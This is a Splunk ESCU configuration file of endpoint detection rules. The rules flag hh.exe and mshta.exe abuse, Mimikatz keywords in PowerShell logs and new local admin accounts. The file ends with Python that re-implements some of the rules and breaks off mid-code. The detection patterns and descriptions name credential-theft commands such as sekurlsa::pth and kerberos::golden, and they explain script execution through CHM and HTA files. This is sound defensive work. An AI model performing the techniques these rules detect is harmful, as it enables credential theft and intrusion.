action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect HTML Help Spawn Child Process - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Compiled HTML Activity", "Living Off The Land", "AgentTesla"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ spawning a child process, typically not normal behavior. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect HTML Help Spawn Child Process - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Compiled HTML Activity", "Living Off The Land", "AgentTesla"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) that spawns a child process. 
This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The "htm" and "html" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review child process events and investigate further. hh.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.notable.param.rule_title = Detect HTML Help Spawn Child Process action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=hh.exe by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_html_help_spawn_child_process_filter` [ESCU - Detect HTML Help URL in Command Line - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) file from a remote url. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. 
Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The "htm" and "html" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review reputation of remote IP and domain. Some instances, it is worth decompiling the .chm file to review its original contents. hh.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) file from a remote url. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The "htm" and "html" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review reputation of remote IP and domain. Some instances, it is worth decompiling the .chm file to review its original contents. hh.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. 
These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although unlikely, some legitimate applications may retrieve a CHM remotely, filter as needed. action.escu.creation_date = 2021-09-16 action.escu.modification_date = 2021-09-16 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect HTML Help URL in Command Line - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Compiled HTML Activity", "Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ contacting a remote destination to potentally download a malicious payload. 
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 90}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 90}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 90}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 90}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect HTML Help URL in Command Line - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Compiled HTML Activity", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 100, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) file from a remote url. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The "htm" and "html" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review reputation of remote IP and domain. Some instances, it is worth decompiling the .chm file to review its original contents. hh.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. 
action.notable.param.rule_title = Detect HTML Help URL in Command Line action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_hh` Processes.process=*http* by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.original_file_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_html_help_url_in_command_line_filter` [ESCU - Detect HTML Help Using InfoTech Storage Handlers - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) file using InfoTech Storage Handlers. This particular technique will load Windows script code from a compiled help file, using InfoTech Storage Handlers. itss.dll will load upon execution. Three InfoTech Storage handlers are supported - ms-its, its, mk:@MSITStore. ITSS may be used to launch a specific html/htm file from within a CHM file. CHM files may contain nearly any file type embedded. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The "htm" and "html" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. 
hh.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) file using InfoTech Storage Handlers. This particular technique will load Windows script code from a compiled help file, using InfoTech Storage Handlers. itss.dll will load upon execution. Three InfoTech Storage handlers are supported - ms-its, its, mk:@MSITStore. ITSS may be used to launch a specific html/htm file from within a CHM file. CHM files may contain nearly any file type embedded. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The "htm" and "html" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. hh.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. 
Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = It is rare to see instances of InfoTech Storage Handlers being used, but it does happen in some legitimate instances. Filter as needed. action.escu.creation_date = 2021-09-16 action.escu.modification_date = 2021-09-16 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect HTML Help Using InfoTech Storage Handlers - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Compiled HTML Activity", "Living Off The Land"] action.risk = 1 action.risk.param._risk_message = $process_name$ has been identified using Infotech Storage Handlers to load a specific file within a CHM on $dest$ under user $user$. 
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 72}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 72}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect HTML Help Using InfoTech Storage Handlers - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Compiled HTML Activity", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 90, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) file using InfoTech Storage Handlers. This particular technique will load Windows script code from a compiled help file, using InfoTech Storage Handlers. itss.dll will load upon execution. Three InfoTech Storage handlers are supported - ms-its, its, mk:@MSITStore. ITSS may be used to launch a specific html/htm file from within a CHM file. CHM files may contain nearly any file type embedded. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analysts may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The "htm" and "html" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. hh.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. 
action.notable.param.rule_title = Detect HTML Help Using InfoTech Storage Handlers action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_hh` Processes.process IN ("*its:*", "*mk:@MSITStore:*") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_html_help_using_infotech_storage_handlers_filter` [ESCU - Detect Mimikatz With PowerShell Script Block Logging - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies common Mimikatz functions that may be identified in the script block, including `mimikatz`. This will catch the most basic use cases for Pass the Ticket, Pass the Hash and `-DumpCreds`. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1003", "T1059.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies common Mimikatz functions that may be identified in the script block, including `mimikatz`. This will catch the most basic use cases for Pass the Ticket, Pass the Hash and `-DumpCreds`. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = False positives should be limited as the commands being identified are quite specific to EventCode 4104 and Mimikatz. Filter as needed. 
action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Mimikatz With PowerShell Script Block Logging - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Malicious PowerShell", "Hermetic Wiper", "Sandworm Tools", "CISA AA22-264A", "CISA AA22-320A", "CISA AA23-347A", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = The following behavior was identified and typically related to MimiKatz being loaded within the context of PowerShell on $Computer$ by $UserID$. action.risk.param._risk = [{"risk_object_field": "UserID", "risk_object_type": "user", "risk_score": 90}, {"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 90}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Mimikatz With PowerShell Script Block Logging - Rule action.correlationsearch.annotations = {"analytic_story": ["Malicious PowerShell", "Hermetic Wiper", "Sandworm Tools", "CISA AA22-264A", "CISA AA22-320A", "CISA AA23-347A", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 100, "impact": 90, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1003", "T1059.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. 
Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies common Mimikatz functions that may be identified in the script block, including `mimikatz`. This will catch the most basic use cases for Pass the Ticket, Pass the Hash and `-DumpCreds`. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.notable.param.rule_title = Detect Mimikatz With PowerShell Script Block Logging action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText IN (*mimikatz*, *-dumpcr*, *sekurlsa::pth*, *kerberos::ptt*, *kerberos::golden*) | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_mimikatz_with_powershell_script_block_logging_filter` [ESCU - Detect mshta inline hta execution - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies "mshta.exe" execution with inline protocol handlers. "JavaScript", "VBScript", and "About" are the only supported options when invoking HTA content directly on the command-line. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process "mshta.exe" and its parent process. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.005"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies "mshta.exe" execution with inline protocol handlers. "JavaScript", "VBScript", and "About" are the only supported options when invoking HTA content directly on the command-line. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process "mshta.exe" and its parent process. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although unlikely, some legitimate applications may exhibit this behavior, triggering a false positive. 
action.escu.creation_date = 2021-09-16 action.escu.modification_date = 2021-09-16 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect mshta inline hta execution - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious MSHTA Activity", "Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ executing with inline HTA, indicative of defense evasion. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 90}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 90}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 90}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 90}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect mshta inline hta execution - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious MSHTA Activity", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 100, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.005"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies "mshta.exe" execution with inline protocol handlers. "JavaScript", "VBScript", and "About" are the only supported options when invoking HTA content directly on the command-line. 
The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process "mshta.exe" and its parent process. action.notable.param.rule_title = Detect mshta inline hta execution action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_mshta` (Processes.process=*vbscript* OR Processes.process=*javascript* OR Processes.process=*about*) by Processes.user Processes.process_name Processes.original_file_name Processes.parent_process_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `detect_mshta_inline_hta_execution_filter` [ESCU - Detect mshta renamed - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies renamed instances of mshta.exe executing. Mshta.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. This analytic utilizes the internal name of the PE to identify whether it is the legitimate mshta binary. Further analysis should be performed to review the executed content and validate that it is the real mshta. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.005"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies renamed instances of mshta.exe executing. Mshta.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. 
This analytic utilizes the internal name of the PE to identify whether it is the legitimate mshta binary. Further analysis should be performed to review the executed content and validate that it is the real mshta. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although unlikely, some legitimate applications may use a moved copy of mshta.exe, but never a renamed one, triggering a false positive. 
action.escu.creation_date = 2022-04-07 action.escu.modification_date = 2022-04-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect mshta renamed - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious MSHTA Activity", "Living Off The Land"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect mshta renamed - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious MSHTA Activity", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.005"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name!=mshta.exe AND Processes.original_file_name=MSHTA.EXE by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.original_file_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_mshta_renamed_filter` [ESCU - Detect MSHTA Url in Command Line - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies when Microsoft HTML Application Host (mshta.exe) utility is used to make remote http connections. 
Adversaries may use mshta.exe to proxy the download and execution of remote .hta files. The analytic identifies command line arguments of http and https being used. This technique is commonly used by malicious software to bypass preventative controls. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process "mshta.exe" and its parent process. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.005"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic identifies when Microsoft HTML Application Host (mshta.exe) utility is used to make remote http connections. Adversaries may use mshta.exe to proxy the download and execution of remote .hta files. The analytic identifies command line arguments of http and https being used. This technique is commonly used by malicious software to bypass preventative controls. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process "mshta.exe" and its parent process. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. 
action.escu.known_false_positives = It is possible legitimate applications may perform this behavior and will need to be filtered. action.escu.creation_date = 2021-09-16 action.escu.modification_date = 2021-09-16 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect MSHTA Url in Command Line - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious MSHTA Activity", "Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to access a remote destination to download an additional payload. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect MSHTA Url in Command Line - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious MSHTA Activity", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.005"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies when Microsoft HTML Application Host 
(mshta.exe) utility is used to make remote http connections. Adversaries may use mshta.exe to proxy the download and execution of remote .hta files. The analytic identifies command line arguments of http and https being used. This technique is commonly used by malicious software to bypass preventative controls. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process "mshta.exe" and its parent process. action.notable.param.rule_title = Detect MSHTA Url in Command Line action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_mshta` (Processes.process="*http://*" OR Processes.process="*https://*") by Processes.user Processes.process_name Processes.parent_process_name Processes.original_file_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `detect_mshta_url_in_command_line_filter` [ESCU - Detect New Local Admin account - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the creation of new accounts that have been elevated to local administrators so that you can take immediate action to mitigate the risks and prevent further unauthorized access or malicious activities. This detection is made by using the Splunk query `wineventlog_security` EventCode=4720 OR (EventCode=4732 Group_Name=Administrators) to search for relevant security events in the Windows event log. 
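The hh.exe InfoTech Storage Handler rule, the Mimikatz script-block rule and the three mshta rules above (inline protocol handlers, renamed binary, URL on the command line) are all wildcard matches over one or two fields. The following Python is an added example, not part of this generated file or of the Splunk security_content project: it re-implements those five matches over constructed endpoint events so the logic can be exercised offline. Field names follow the Endpoint.Processes data model and the raw EventCode 4104 fields used in the searches; the expansions of the `process_hh` and `process_mshta` macros (process name or PE original file name) and the sample events themselves are assumptions.

```python
import fnmatch
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple

Event = Dict[str, object]


def glob_any(value: object, patterns: List[str]) -> bool:
    """Case-insensitive wildcard match of one field value against a list of
    Splunk-style patterns, as in `Processes.process IN ("*its:*", ...)`."""
    text = str(value or "").lower()
    return any(fnmatch.fnmatchcase(text, p.lower()) for p in patterns)


def is_hh(e: Event) -> bool:
    # Assumed expansion of the `process_hh` macro.
    return (str(e.get("process_name", "")).lower() == "hh.exe"
            or str(e.get("original_file_name", "")).upper() == "HH.EXE")


def is_mshta(e: Event) -> bool:
    # Assumed expansion of the `process_mshta` macro.
    return (str(e.get("process_name", "")).lower() == "mshta.exe"
            or str(e.get("original_file_name", "")).upper() == "MSHTA.EXE")


@dataclass(frozen=True)
class Rule:
    name: str                        # ESCU rule title
    where: Callable[[Event], bool]   # fixed-field part of the `where` clause
    patterns: List[str]              # wildcard patterns taken from the search
    field: str = "process"           # field the patterns are applied to


RULES = [
    Rule("Detect HTML Help Using InfoTech Storage Handlers", is_hh,
         ["*its:*", "*mk:@MSITStore:*"]),
    Rule("Detect mshta inline hta execution", is_mshta,
         ["*vbscript*", "*javascript*", "*about*"]),
    Rule("Detect MSHTA Url in Command Line", is_mshta,
         ["*http://*", "*https://*"]),
    Rule("Detect mshta renamed",
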